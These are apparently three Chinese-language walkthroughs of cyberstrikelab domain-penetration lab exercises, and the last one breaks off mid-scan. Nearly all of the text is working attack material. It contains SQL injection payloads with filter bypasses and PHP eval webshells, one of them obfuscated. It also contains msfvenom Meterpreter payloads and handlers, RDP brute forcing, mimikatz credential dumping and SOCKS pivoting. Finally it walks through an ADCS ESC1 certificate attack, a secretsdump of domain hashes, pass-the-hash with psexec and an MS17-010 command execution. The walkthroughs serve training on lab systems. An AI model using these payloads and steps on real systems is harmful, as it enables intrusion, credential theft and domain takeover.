【域渗透】cyberstrikelab-lab9 cyberstrikelab-lab9第一台web 172.5.33.6sql的payloadhttp://172.5.33.6/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5 a66abb5684c45962d887564f08346e8d 解密 admin123456从robots.txt中发现admin地址，登录管理员账号在这里发现了html模板中包含了php代码在模板管理中修改index.html<?php @eval($_POST['a']);?> 一句话还是连不上的，尝试另一种马，好像也没有其他方法能打进去了，网上找了十多种写法的马，就这种有效<?php function simpleTransform($str, $offset = 1) { $transformed = ''; for ($i = 0; $i < strlen($str); $i++) { $transformed .= chr((ord($str[$i]) + $offset) % 256); } return $transformed; } $original = $_REQUEST["a"]; $transformed = simpleTransform($original, 3); function reverseTransform($str, $offset = 1) { $reversed = ''; for ($i = 0; $i < strlen($str); $i++) { $reversed .= chr((ord($str[$i]) - $offset + 256) % 256); } return $reversed; } $reversed = reverseTransform($transformed, 3); echo eval($reversed); 蚁剑连接生马msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 上线msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/bind_tcp; set RHOST 172.5.33.6; set LPORT 4444; exploit -j -z" 提权，上传fscanmeterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE meterpreter > getsystem ...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 查ip，扫内网C:\phpstudy_pro\WWW>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 1: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::3f:d815:5529:b836%11 IPv4 Address. . . . . . . . . . . : 172.5.33.6 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.5.33.233 Ethernet adapter ��̫��ʵ�� 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::c133:dd94:56a9:bdcc%2 IPv4 Address. . . . . . . . . . . : 10.6.6.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.6.6.1 Tunnel adapter isatap.{730545FA-7DC0-4716-8AF2-678FFC6D1F1C}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter isatap.{E6E2FD25-6949-4C86-A749-7F0F14616295}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.10/24 fscan.exe -h 10.6.6.10/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 10.6.6.10 is alive (icmp) Target 10.6.6.55 is alive (icmp) Target 10.6.6.88 is alive [*] Icmp alive hosts len is: 3 10.6.6.55:88 open 10.6.6.10:3306 open 10.6.6.88:445 open 10.6.6.55:445 open 10.6.6.10:445 open 10.6.6.88:139 open 10.6.6.55:139 open 10.6.6.10:139 open 10.6.6.88:135 open 10.6.6.55:135 open 10.6.6.10:135 open 10.6.6.55:80 open 10.6.6.10:80 open [*] alive ports len is: 13 start vulscan [+] NetInfo: [*]10.6.6.10 [->]WIN-784BAKDI0AC [->]172.5.33.6 [->]10.6.6.10 [+] NetInfo: [*]10.6.6.55 [->]DC [->]10.6.6.55 [+] NetInfo: [*]10.6.6.88 [->]cyberweb [->]10.6.6.88 [*] WebTitle:http://10.6.6.10 code:200 len:0 title:None [*] 10.6.6.55 [+]DC __MSBROWSE__\DC Windows Server 2016 Standard 14393 [*] 10.6.6.88 CYBERSTRIKELAB\CYBERWEB Windows Server 2016 Standard 14393 [*] 10.6.6.88 (Windows Server 2016 Standard 14393) [*] 10.6.6.55 (Windows Server 2016 Standard 14393) [*] WebTitle:http://10.6.6.55 code:200 len:703 title:IIS Windows Server [+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect 已完成 13/13 [*] 扫描结束,耗时: 1m8.3819491s 其中10.6.6.55被识别为域控制器10.6.6.88是域成员，主机名cyberweb，属于域CYBERSTRIKELAB10.6.6.55: 报告了一个漏洞 poc-yaml-active-directory-certsrv-detect。这强烈暗示该服务器上运行着 Active Directory 证书服务 (AD CS)，是后续攻击的关键入口。设置路由，配置代理meterpreter > run post/multi/manage/autoroute [*] Running module against WIN-784BAKDI0AC (172.5.33.6) [*] Searching for subnets to autoroute. [+] Route added to subnet 10.6.6.0/255.255.255.0 from host's routing table. [+] Route added to subnet 172.5.33.0/255.255.255.0 from host's routing table. meterpreter > bg [*] Backgrounding session 2... msf exploit(multi/handler) > use auxiliary/server/socks_proxy msf auxiliary(server/socks_proxy) > set VERSION 5 VERSION => 5 msf auxiliary(server/socks_proxy) > set SRVPORT 1080 SRVPORT => 1080 msf auxiliary(server/socks_proxy) > run -j [*] Auxiliary module running as background job 1. [*] Starting the SOCKS proxy server 配置系统代理配置文件proxychains4.conf┌──(root㉿kali)-[/data/windows_atk/domain_atk] └─# tail -n \6 /etc/proxychains4.conf [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks5 127.0.0.1 1080 第二台fscan定向扫描，端口，发现3389能进行爆破，administrator密码为qwe123!@#C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.88 -p 1-10000 fscan.exe -h 10.6.6.88 -p 1-10000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 10.6.6.88 is alive [*] Icmp alive hosts len is: 1 10.6.6.88:445 open 10.6.6.88:139 open 10.6.6.88:135 open 10.6.6.88:3389 open 10.6.6.88:5985 open [*] alive ports len is: 5 start vulscan [+] NetInfo: [*]10.6.6.88 [->]cyberweb [->]10.6.6.88 [*] 10.6.6.88 (Windows Server 2016 Standard 14393) [*] WebTitle:http://10.6.6.88:5985 code:404 len:315 title:Not Found [*] 10.6.6.88 CYBERSTRIKELAB\CYBERWEB Windows Server 2016 Standard 14393 已完成 3/5 [-] (18/210) rdp 10.6.6.88:3389 administrator administrator1 remote error: tls: access denied 已完成 4/5 [-] (36/210) rdp 10.6.6.88:3389 administrator 123456789 remote error: tls: access denied 已完成 4/5 [-] (54/210) rdp 10.6.6.88:3389 administrator Aa12345 remote error: tls: access denied [+] RDP:10.6.6.88:3389:administrator qwe123!@# 已完成 5/5 [*] 扫描结束,耗时: 4m8.7461024s 在桌面找到第二个flag第三台看样子需要利用域控相关的漏洞了，永恒之蓝失败use exploit/multi/handler set rhost 10.6.6.88 run 共享data目录（便于传输文件），然后将正向马传上去，并执行proxychains rdesktop 10.6.6.88 -r disk:shell=/data 提权meterpreter > getuid Server username: CYBERWEB\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 抓取域内hashC:\Users\Administrator\Desktop>mimikatz.exe mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords User Name : CYBERWEB$ Domain : CYBERSTRIKELAB NTLM : 5e0d5d7bacf2087dfd44ea47812b5165 User Name : CYBERWEB$ Domain : CYBERSTRIKELAB NTLM : 331dcbb88d1a4847c97eab7c1c168ac8 User Name : Administrator Domain : CYBERWEB NTLM : c377ba8a4dd52401bc404dbe49771bbc 在这个3.bat文件中发现了一个账号密码，cslab / cs1ab@wwe第三台：ADCSADCS是横向移动到域控制器的常见路径3.1 侦察ADCS服务之前fscan扫出来的[+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect 表明可能存在AD证书服务再次上线getsystem，获取一个系统权限的cmd，获取一下CA名字（需要提权到system），执行 certutil名称为 cyberstrikelab-DC-CA获取到CA名称后，我们需要确定攻击入口，并且寻找可利用的漏洞，比如ESC1漏洞┌──(root㉿kali)-[/data/demo] └─# proxychains certipy-ad find -u 'cslab@10.6.6.55' -password 'cs1ab@wwe' -dc-ip 10.6.6.55 -vulnerable -stdout [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v5.0.3 - by Oliver Lyak (ly4k) [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:636 ... OK [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Finding issuance policies [*] Found 15 issuance policies [*] Found 0 OIDs linked to templates [!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out. [!] Use -debug to print a stacktrace [*] Retrieving CA configuration for 'cyberstrikelab-DC-CA' via RRP [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:445 <--socket error or timeout! [-] Failed to connect to remote registry: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused [-] Use -debug to print a stacktrace [!] Failed to get CA configuration for 'cyberstrikelab-DC-CA' via RRP: 'NoneType' object has no attribute 'request' [!] Use -debug to print a stacktrace [!] Could not retrieve configuration for 'cyberstrikelab-DC-CA' [*] Checking web enrollment for CA 'cyberstrikelab-DC-CA' @ 'DC.cyberstrikelab.com' [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:80 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:443 ... OK [*] Enumeration output: Certificate Authorities 0 CA Name : cyberstrikelab-DC-CA DNS Name : DC.cyberstrikelab.com Certificate Subject : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com Certificate Serial Number : 652A47597C7F03824B7815EBE474E40B Certificate Validity Start : 2025-04-22 07:45:38+00:00 Certificate Validity End : 2030-04-22 07:55:38+00:00 Web Enrollment HTTP Enabled : False HTTPS Enabled : False User Specified SAN : Unknown Request Disposition : Unknown Enforce Encryption for Requests : Unknown Active Policy : Unknown Disabled Extensions : Unknown Certificate Templates 0 Template Name : DC Display Name : DC Certificate Authorities : cyberstrikelab-DC-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Extended Key Usage : Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Template Created : 2025-04-22T07:58:11+00:00 Template Last Modified : 2025-04-22T07:58:11+00:00 Permissions Enrollment Permissions Enrollment Rights : CYBERSTRIKELAB.COM\Domain Users CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Domain Computers CYBERSTRIKELAB.COM\Enterprise Admins CYBERSTRIKELAB.COM\Authenticated Users Object Control Permissions Owner : CYBERSTRIKELAB.COM\Administrator Full Control Principals : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Enterprise Admins Write Owner Principals : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Enterprise Admins Write Dacl Principals : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Enterprise Admins Write Property Enroll : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Domain Computers CYBERSTRIKELAB.COM\Enterprise Admins [+] User Enrollable Principals : CYBERSTRIKELAB.COM\Authenticated Users CYBERSTRIKELAB.COM\Domain Computers CYBERSTRIKELAB.COM\Domain Users [!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication. 参数来源/原因作用proxychains之前建立的代理配置让命令流量通过跳板机(10.6.6.10)进入内网certipy-ad工具选择专门用于AD证书服务攻击的工具find子命令查找证书模板和证书颁发机构(CA)-u 'cslab@10.6.6.55'从mimikatz获得使用域用户cslab，@后可以是IP或域名-password 'cs1ab@wwe'从mimikatz/3.bat获得cslab用户的密码-dc-ip 10.6.6.55fscan扫描结果指定域控制器的IP地址-vulnerable攻击目标只显示存在已知漏洞的证书模板-stdout输出选项将结果输出到终端从结果中看出，存在ESC1漏洞Template Name: DC Enabled: True Client Authentication: True Enrollee Supplies Subject: True # ESC1漏洞关键点 Enrollment Rights: CYBERSTRIKELAB.COM\Domain Users # cslab可申请 Vulnerabilities: ESC1 3.2 利用ESC1漏洞3.2.1 创建机器账户（临时）利用cslab这个域用户在目标域中创建一个新的机器账户，结果会返回一个临时用户tmpuser$和密码信息proxychains certipy-ad -debug account create -u 'cslab@cyberstrikelab.com' -p 'cs1ab@wwe' -dc-ip 10.6.6.55 -user tmpuser -dns DC.cyberstrikelab.com 参数来源/原因作用account create子命令在域中创建新的机器账户-user tmpuser自定义创建名为tmpuser$的机器账户-dns DC.cyberstrikelab.com从fscan结果获得设置机器账户的DNS主机名为什么要创建？Machine模板限制：有些证书模板（如Machine）只允许机器账户申请 隐蔽性：避免直接使用cslab账户进行敏感操作 权限要求：机器账户可以申请更广泛的证书类型 3.2.2 以机器账户请求证书通过新创建的机器账户 tmpuser$ 向目标域控制器（10.6.6.55）的证书颁发机构（CA）申请一个 机器证书（要多运行几次，运行一次可能成功不了）proxychains certipy-ad req \ -u 'tmpuser$@cyberstrikelab.com' \ -p 'kQb8YIJOWcKq69w5' \ -ca 'cyberstrikelab-DC-CA' \ -target 10.6.6.55 \ -template 'Machine' \ -dc-ip 10.6.6.55 参数来源/原因作用req子命令请求证书-u 'tmpuser$@...'上一步创建使用新创建的机器账户-p 'kQb8YIJOWcKq69w5'上一步输出机器账户的密码-ca 'cyberstrikelab-DC-CA'certipy find结果证书颁发机构的名称-target 10.6.6.55fscan扫描结果CA服务器的IP地址-template 'Machine'侦察发现利用存在漏洞的模板用dc.pfx 证书文件向域控制器 (10.6.6.55) 进行身份认证，却报了Kerberos时钟偏差，攻击机和域控时间是不能相差5分钟以上的┌──(root㉿kali)-[/data/demo] └─# proxychains certipy-ad auth -pfx dc.pfx -dc-ip 10.6.6.55 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN DNS Host Name: 'DC.cyberstrikelab.com' [*] Using principal: 'dc$@cyberstrikelab.com' [*] Trying to get TGT... [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK [-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) [-] Use -debug to print a stacktrace [-] See the wiki for more information 3.2.3 修复Kerberos时间偏差查询域控时间proxychains net time -S 10.6.6.55 3.2.4 使用证书进行身份验证修改时间参数，这样就能执行成功了┌──(root㉿kali)-[/data/demo] └─# faketime '2025-12-11 22:57:01' proxychains certipy-ad -debug auth -pfx dc.pfx -dc-ip 10.6.6.55 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v5.0.3 - by Oliver Lyak (ly4k) [+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations [+] Nameserver: '10.6.6.55' [+] DC IP: '10.6.6.55' [+] DC Host: '' [+] Target IP: '10.6.6.55' [+] Remote Name: '10.6.6.55' [+] Domain: '' [+] Username: '' [*] Certificate identities: [*] SAN DNS Host Name: 'DC.cyberstrikelab.com' [*] Using principal: 'dc$@cyberstrikelab.com' [*] Trying to get TGT... [+] Sending AS-REQ to KDC cyberstrikelab.com (10.6.6.55) [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK [*] Got TGT [*] Saving credential cache to 'dc.ccache' [+] Attempting to write data to 'dc.ccache' [+] Data written to 'dc.ccache' [*] Wrote credential cache to 'dc.ccache' [*] Trying to retrieve NT hash for 'dc$' [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK [*] Got hash for 'dc$@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa 参数来源/原因作用auth子命令使用证书进行Kerberos认证-pfx dc.pfx上一步生成包含私钥的证书文件-debug调试选项显示详细过程信息认证过程：证书提交：向域控(10.6.6.55)提交dc.pfx证书身份验证：证书证明申请者是DC$（域控制器机器账户）TGT获取：成功获取DC$的Kerberos票证授予票证(TGT)哈希提取：从TGT中提取DC$的NTLM哈希3.2.5 获取NTLM哈希用域控的机器账号 dc$ 的 NT 哈希，进行 Pass-the-Hash 身份验证，尝试从域控中提取所有域用户的凭据信息（如 NTLM 哈希等）。┌──(root㉿kali)-[/data/demo] └─# proxychains impacket-secretsdump cyberstrikelab.com/dc\$@10.6.6.55 -hashes aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:445 ... OK [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:49669 ... OK Administrator:500:aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:416f4ea64c9c73ad29a4a69dcee5d8ca::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: cyberstrikelab.com\cslab:1104:aad3b435b51404eeaad3b435b51404ee:39b0e84f13872f51efb3b8ba5018c517::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa::: CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:7e5d2858c617c4ccf32b28241dc5b8b2::: tmpuser$:1105:aad3b435b51404eeaad3b435b51404ee:6fe8e4da8776622663eed7aba05de2f7::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:8583c13a9eca67e085ff0b68af74316bef0ebd3fb197bb235b76cbb72358f2ef Administrator:aes128-cts-hmac-sha1-96:6012285d474e3b60086965219ac7e31c Administrator:des-cbc-md5:208fc8f42fae3132 krbtgt:aes256-cts-hmac-sha1-96:0b820697b640266ced6843c4041131c1e3750000e00d47c0c597a82547927337 krbtgt:aes128-cts-hmac-sha1-96:c8f683e4cf2033fd75416667670e13bb krbtgt:des-cbc-md5:23dc674a76bf7adc cyberstrikelab.com\cslab:aes256-cts-hmac-sha1-96:34439b0bf9f6e1bf57d4d859215ed387a9c75e944ac053ddd1bc2f1e5b162048 cyberstrikelab.com\cslab:aes128-cts-hmac-sha1-96:84a132b5db39e2e652c08b8148fecb00 cyberstrikelab.com\cslab:des-cbc-md5:46f457ef2aad0e08 DC$:aes256-cts-hmac-sha1-96:2292c30804bdf9a61d170f48d38b30d3f843bb8310677ac7116e925f663edcbd DC$:aes128-cts-hmac-sha1-96:b583afdc96a04ec0ceda8dffdfa2e883 DC$:des-cbc-md5:a75801e31943a2dc CYBERWEB$:aes256-cts-hmac-sha1-96:c0418d75b0ef82607eadcd0f4793441aa17fc71df788e83a531ae87ce2cc92d9 CYBERWEB$:aes128-cts-hmac-sha1-96:3c602f53a3722c0a602a5adf2114354a CYBERWEB$:des-cbc-md5:6d5dd3261f38c862 tmpuser$:aes256-cts-hmac-sha1-96:952c1a920206e3a5852ea56dfdde77acb8270bf12628c29a7f702a9cdc8fb081 tmpuser$:aes128-cts-hmac-sha1-96:1174b1ae9d7f4b04fd5eef81bcbd2144 tmpuser$:des-cbc-md5:795d80ec58cdd5a8 [*] Cleaning up... 参数来源/原因作用impacket-secretsdump工具选择远程提取密码哈希的工具cyberstrikelab.com/dc\$@10.6.6.55目标指定使用dc$账户连接域控-hashes ...上一步获得提供dc$的LM和NTLM哈希dc\$中的\Shell转义防止$被Shell解释为变量3.2.6 PTHPTH，拿下域控，在根目录获取最后的flag┌──(root㉿kali)-[/data/demo] └─# proxychains impacket-psexec -hashes :28cfbc91020438f2a064a63fff9871fa cyberstrikelab.com/administrator@10.6.6.55      

【域渗透】cyberstrikelab-lab5 cyberstrikelab-lab5web渗透BEESCMS1、后台发现验证码复用漏洞，后台账号密码可以爆破2、后台sql注入漏洞admin' order by 5--+ # and 被过滤 admin' and updatexml(1,concat(0x7e,select database(),0x7e),1)--+ # 去掉前面的空格 admin'and updatexml(1,concat(0x7e,select database(),0x7e),1)--+ # 报错信息如下，数据库名beescms 操作数据库失败XPATH syntax error: '~，beescms~'<br>sql:select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name='admin'and updatexml(1,concat(0x7e, database(),0x7e),1)-- ' limit 0,1 # 其他双写绕过 union => uni union on select => selselectect from => fr from om where => wh where ere # 列1 admin_name admin'a and nd updatexml(1,concat(0x7e,(seselectlect column_name fr from om information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e),1)# # 列2 admin_password admin'a and nd updatexml(1,concat(0x7e,(seselectlect column_name fr from om information_schema.columns wh where ere table_name like 'bees_admin' limit 2,1),0x7e),1)# # 字段1 admin admin'a and nd updatexml(1,concat(0x7e,(seselectlect admin_name fr from om beescms.bees_admin limit 0,1),0x7e),1)# # 字段2 7e60bc642fefc11b43792e8745df6c1 // cmd5.com 解密 cyber admin'a and nd updatexml(1,concat(0x7e,(seselectlect admin_password fr from om beescms.bees_admin limit 0,1),0x7e),1)# 密码cyber，登录，版本就是4.0准备一个图片马，shell.jpg，抓包修改shell.php<?php @eval($_POST['shell']); ?> 在上传图片管理界面，查看网页源码，找到新上传图片的html标签能看到php文件路径，然后蚁剑连接http://192.168.10.10:6582/upload/img/202512101423498303.php 内网渗透msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z" upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe upload /data/windows_atk/mimikatz/x64/x64/mimikatz.exe fscan扫内网，在20.20的8080端口，有一个Jboss内容管理系统C:\phpstudy_pro\WWW\upload\img>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::d4eb:d150:7852:d93f%8 IPv4 Address. . . . . . . . . . . : 192.168.10.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.233 Ethernet adapter ��̫��ʵ�� 0 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::f90f:239c:ae8a:42db%15 IPv4 Address. . . . . . . . . . . : 192.168.20.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.20.1 C:\phpstudy_pro\WWW\upload\img>fscan.exe -h 192.168.20.0/24 fscan.exe -h 192.168.20.0/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.20.10 is alive (icmp) Target 192.168.20.20 is alive (icmp) Target 192.168.20.30 is alive [*] Icmp alive hosts len is: 3 192.168.20.10:445 open 192.168.20.20:139 open 192.168.20.20:135 open 192.168.20.30:88 open 192.168.20.20:8080 open 192.168.20.10:3306 open 192.168.20.30:445 open 192.168.20.20:445 open 192.168.20.30:139 open 192.168.20.10:139 open 192.168.20.30:135 open 192.168.20.10:135 open 192.168.20.20:8009 open 192.168.20.10:7680 open [*] alive ports len is: 14 start vulscan [+] NetInfo: [*]192.168.20.20 [->]cyberweb [->]192.168.20.20 [+] NetInfo: [*]192.168.20.30 [->]WIN-7NRTJO59O7N [->]192.168.20.30 [*] 192.168.20.30 [+]DC __MSBROWSE__\WIN-7NRTJO59O7N [*] 192.168.20.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600 [*] WebTitle:http://192.168.20.20:8080 code:200 len:1554 title:Welcome to JBoss AS [+] InfoScan:http://192.168.20.20:8080 [Jboss] 已完成 14/14 [*] 扫描结束,耗时: 18.7052044s 设置路由，配置代理meterpreter > run post/multi/manage/autoroute [*] Running module against DESKTOP-JFB57A8 (192.168.10.10) [*] Searching for subnets to autoroute. [+] Route added to subnet 192.168.10.0/255.255.255.0 from host's routing table. [+] Route added to subnet 192.168.20.0/255.255.255.0 from host's routing table. meterpreter > bg [*] Backgrounding session 1... msf exploit(multi/handler) > use auxiliary/server/socks_proxy msf auxiliary(server/socks_proxy) > set VERSION 5 VERSION => 5 msf auxiliary(server/socks_proxy) > set SRVPORT 1080 SRVPORT => 1080 msf auxiliary(server/socks_proxy) > run -j [*] Auxiliary module running as background job 1. [*] Starting the SOCKS proxy server 设置proxychains4配置文件，代理到msf┌──(root㉿kali)-[/data/demo] └─# tail /etc/proxychains4.conf # socks4 192.168.1.49 1080 # http 192.168.39.93 8080 # rted: "basic"-http "user/pass"-socks ) # [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks5 127.0.0.1 1080 获取到对方内网的 Jboss cms这个可以利用jboss综合利用工具，获取到第二个flag第三台，永恒之蓝命令执行，反弹shell和其他的都不行use auxiliary/admin/smb/ms17_010_command set RHOSTS 192.168.20.30 set COMMAND type C:\\flag.txt run 最后得到flaggo-flag{Cfg8hlBj4dXppo5j}

【域渗透】cyberstrikelab-Lab4，ZeroLogon漏洞获取域控权限 cyberstrikelab-Lab4Web渗透5820端口是web服务sql注入https://www.cnblogs.com/shamaxian/p/19319207sqlmap -u "http://192.168.10.10:5820/ad_js.php?ad_id=1" -p ad_id --dump admin / admin123456登录后台 /admingetshell，直接修改源码POC参考链接：https://blog.csdn.net/cainsoftware/article/details/119116430http://192.168.10.10:5820/admin/tpl_manage.php?act=edit&tpl_name=../../ann.php 修改内容如下<?php @eval($_POST['a']);?> msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set LHOST 192.168.10.10; set LPORT 4444; exploit -j -z" 内网渗透getuid发现已经是系统权限msf exploit(multi/handler) > run [*] Started bind TCP handler against 192.168.10.10:4444 [*] Sending stage (177734 bytes) to 192.168.10.10 [*] Meterpreter session 4 opened (10.10.10.173:43577 -> 192.168.10.10:4444) at 2025-12-09 22:07:22 -0500 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 上传fscan，扫内网，发现7001端口weblogicmeterpreter > upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe [*] Uploading : /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe -> fscan.exe [*] Uploaded 5.18 MiB of 5.18 MiB (100.0%): /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe -> fscan.exe [*] Completed : /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe -> fscan.exe meterpreter > shell Process 2316 created. Channel 2 created. Microsoft Windows [�汾 10.0.18363.592] (c) 2019 Microsoft Corporation����������Ȩ���� C:\phpstudy_pro\WWW>chcp 65001 chcp 65001 Active code page: 65001 C:\phpstudy_pro\WWW>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::1dfe:1621:b57c:7f61%17 IPv4 Address. . . . . . . . . . . : 192.168.10.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.233 Ethernet adapter ��̫��ʵ�� 0 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::402e:23ec:6cb6:e625%16 IPv4 Address. . . . . . . . . . . : 192.168.20.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.20.1 C:\phpstudy_pro\WWW>fscan.exe -h 192.168.20.0/24 fscan.exe -h 192.168.20.0/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.20.10 is alive (icmp) Target 192.168.20.20 is alive (icmp) Target 192.168.20.30 is alive [*] Icmp alive hosts len is: 3 